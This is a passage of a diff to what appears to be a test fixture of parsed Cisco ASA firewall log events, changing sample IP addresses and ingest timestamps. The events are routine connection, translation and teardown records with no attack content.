-7177,8 +7177,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721640100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099606800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7214,8 +7214,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7249,7 +7249,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7258,8 +7258,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721644500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099612900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7295,8 +7295,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7330,7 +7330,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7339,8 +7339,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721648700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099618800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7376,8 +7376,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7411,7 +7411,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7420,8 +7420,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721652800Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099639800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7457,8 +7457,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7492,7 +7492,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7501,8 +7501,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721656900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099645500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7538,8 +7538,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7573,7 +7573,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7582,8 +7582,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721661500Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099667900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7619,8 +7619,8 @@ }, "source": { "port": 80, - "address": "100.66.19.254", - "ip": "100.66.19.254" + "address": "192.168.19.254", + "ip": "192.168.19.254" }, "tags": [ "preserve_original_event" @@ -7654,7 +7654,7 @@ "localhost" ], "ip": [ - "100.66.19.254", + "192.168.19.254", "172.31.98.44" ] }, @@ -7663,8 +7663,8 @@ }, "event": { "severity": 4, - "ingested": "2021-09-07T12:21:32.721665700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", + "ingested": "2021-12-09T13:34:28.099673500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:192.168.19.254/80 dst inside:172.31.98.44/8277 by access-group \"inbound\" [0x0, 0x0]", "code": "106023", "kind": "event", "action": "firewall-rule", @@ -7695,8 +7695,8 @@ }, "destination": { "port": 8279, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1275, @@ -7736,7 +7736,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7744,8 +7744,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721670100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279", + "ingested": "2021-12-09T13:34:28.099679200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:192.168.98.44/8279", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7778,8 +7778,8 @@ }, "source": { "port": 80, - "address": "100.66.205.99", - "ip": "100.66.205.99" + "address": "192.168.205.99", + "ip": "192.168.205.99" }, "tags": [ "preserve_original_event" @@ -7814,7 +7814,7 @@ "localhost" ], "ip": [ - "100.66.205.99", + "192.168.205.99", "172.31.98.44" ] }, @@ -7823,8 +7823,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721674400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", + "ingested": "2021-12-09T13:34:28.099684800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:192.168.205.99/80 (192.168.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -7840,7 +7840,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.205.99", + "mapped_source_ip": "192.168.205.99", "connection_id": "11799", "source_interface": "outside", "mapped_destination_port": 1275 @@ -7857,8 +7857,8 @@ }, "destination": { "port": 1190, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 56132, @@ -7898,7 +7898,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -7906,8 +7906,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721678700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190", + "ingested": "2021-12-09T13:34:28.099688900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1190", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -7940,8 +7940,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -7976,7 +7976,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -7985,8 +7985,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721682900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099692300Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:192.168.14.30/53 (192.168.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8002,7 +8002,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.14.30", + "mapped_source_ip": "192.168.14.30", "connection_id": "11800", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8024,8 +8024,8 @@ }, "source": { "port": 53, - "address": "100.66.14.30", - "ip": "100.66.14.30" + "address": "192.168.14.30", + "ip": "192.168.14.30" }, "tags": [ "preserve_original_event" @@ -8060,7 +8060,7 @@ "localhost" ], "ip": [ - "100.66.14.30", + "192.168.14.30", "172.31.98.44" ] }, @@ -8070,8 +8070,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721687200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", + "ingested": "2021-12-09T13:34:28.099696600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:192.168.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8108,8 +8108,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8144,7 +8144,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8153,8 +8153,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721691400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", + "ingested": "2021-12-09T13:34:28.099701700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:192.168.252.210/53 (192.168.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)", "code": "302015", "kind": "event", "action": "firewall-rule", @@ -8170,7 +8170,7 @@ "destination_interface": "inside", "mapped_source_port": 53, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.252.210", + "mapped_source_ip": "192.168.252.210", "connection_id": "11801", "source_interface": "outside", "mapped_destination_port": 56132 @@ -8192,8 +8192,8 @@ }, "source": { "port": 53, - "address": "100.66.252.210", - "ip": "100.66.252.210" + "address": "192.168.252.210", + "ip": "192.168.252.210" }, "tags": [ "preserve_original_event" @@ -8228,7 +8228,7 @@ "localhost" ], "ip": [ - "100.66.252.210", + "192.168.252.210", "172.31.98.44" ] }, @@ -8238,8 +8238,8 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-09-07T12:21:32.721695700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", + "ingested": "2021-12-09T13:34:28.099706500Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:192.168.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207", "code": "302016", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8271,8 +8271,8 @@ }, "destination": { "port": 8280, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1276, @@ -8312,7 +8312,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8320,8 +8320,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721699900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280", + "ingested": "2021-12-09T13:34:28.099712200Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:192.168.98.44/8280", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8354,8 +8354,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8390,7 +8390,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8399,8 +8399,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721704200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", + "ingested": "2021-12-09T13:34:28.099716400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8416,7 +8416,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11802", "source_interface": "outside", "mapped_destination_port": 1276 @@ -8433,8 +8433,8 @@ }, "destination": { "port": 8281, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1277, @@ -8474,7 +8474,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8482,8 +8482,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721708400Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281", + "ingested": "2021-12-09T13:34:28.099720700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:192.168.98.44/8281", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8516,8 +8516,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8552,7 +8552,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8561,8 +8561,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721712700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", + "ingested": "2021-12-09T13:34:28.099724100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8578,7 +8578,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11803", "source_interface": "outside", "mapped_destination_port": 1277 @@ -8600,8 +8600,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8636,7 +8636,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8647,8 +8647,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721716700Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", + "ingested": "2021-12-09T13:34:28.099728400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:192.168.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8680,8 +8680,8 @@ }, "destination": { "port": 8282, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1278, @@ -8721,7 +8721,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8729,8 +8729,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721721100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282", + "ingested": "2021-12-09T13:34:28.099734100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:192.168.98.44/8282", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -8763,8 +8763,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8799,7 +8799,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8808,8 +8808,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721725200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", + "ingested": "2021-12-09T13:34:28.099739700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -8825,7 +8825,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11804", "source_interface": "outside", "mapped_destination_port": 1278 @@ -8847,8 +8847,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -8883,7 +8883,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -8894,8 +8894,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721729900Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", + "ingested": "2021-12-09T13:34:28.099745700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:192.168.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -8927,8 +8927,8 @@ }, "destination": { "port": 8283, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1279, @@ -8968,7 +8968,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -8976,8 +8976,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721734100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283", + "ingested": "2021-12-09T13:34:28.099753700Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:192.168.98.44/8283", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9010,8 +9010,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9046,7 +9046,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9055,8 +9055,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721738300Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", + "ingested": "2021-12-09T13:34:28.099759600Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9072,7 +9072,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11805", "source_interface": "outside", "mapped_destination_port": 1279 @@ -9094,8 +9094,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9130,7 +9130,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9141,8 +9141,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721742600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", + "ingested": "2021-12-09T13:34:28.099765100Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:192.168.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9179,8 +9179,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9215,7 +9215,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9226,8 +9226,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721747Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", + "ingested": "2021-12-09T13:34:28.099770800Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:192.168.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9259,8 +9259,8 @@ }, "destination": { "port": 8284, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1280, @@ -9300,7 +9300,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9308,8 +9308,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721752100Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284", + "ingested": "2021-12-09T13:34:28.099776400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:192.168.98.44/8284", "code": "305011", "kind": "event", "action": "firewall-rule", @@ -9342,8 +9342,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9378,7 +9378,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9387,8 +9387,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721757600Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", + "ingested": "2021-12-09T13:34:28.099781900Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:192.168.98.165/80 (192.168.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280)", "code": "302013", "kind": "event", "action": "firewall-rule", @@ -9404,7 +9404,7 @@ "destination_interface": "inside", "mapped_source_port": 80, "mapped_destination_ip": "172.31.98.44", - "mapped_source_ip": "100.66.98.165", + "mapped_source_ip": "192.168.98.165", "connection_id": "11806", "source_interface": "outside", "mapped_destination_port": 1280 @@ -9426,8 +9426,8 @@ }, "source": { "port": 80, - "address": "100.66.98.165", - "ip": "100.66.98.165" + "address": "192.168.98.165", + "ip": "192.168.98.165" }, "tags": [ "preserve_original_event" @@ -9462,7 +9462,7 @@ "localhost" ], "ip": [ - "100.66.98.165", + "192.168.98.165", "172.31.98.44" ] }, @@ -9473,8 +9473,8 @@ "severity": 6, "duration": 0, "reason": "TCP FINs", - "ingested": "2021-09-07T12:21:32.721762200Z", - "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", + "ingested": "2021-12-09T13:34:28.099787400Z", + "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:192.168.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs", "code": "302014", "kind": "event", "start": "2018-10-10T12:34:56.000Z", @@ -9506,8 +9506,8 @@ }, "destination": { "port": 8285, - "address": "100.66.98.44", - "ip": "100.66.98.44" + "address": "192.168.98.44", + "ip": "192.168.98.44" }, "source": { "port": 1281, @@ -9547,7 +9547,7 @@ ], "ip": [ "172.31.98.44", - "100.66.98.44" + "192.168.98.44" ] }, "host": { @@ -9555,8 +9555,8 @@ }, "event": { "severity": 6, - "ingested": "2021-09-07T12:21:32.721766500Z", 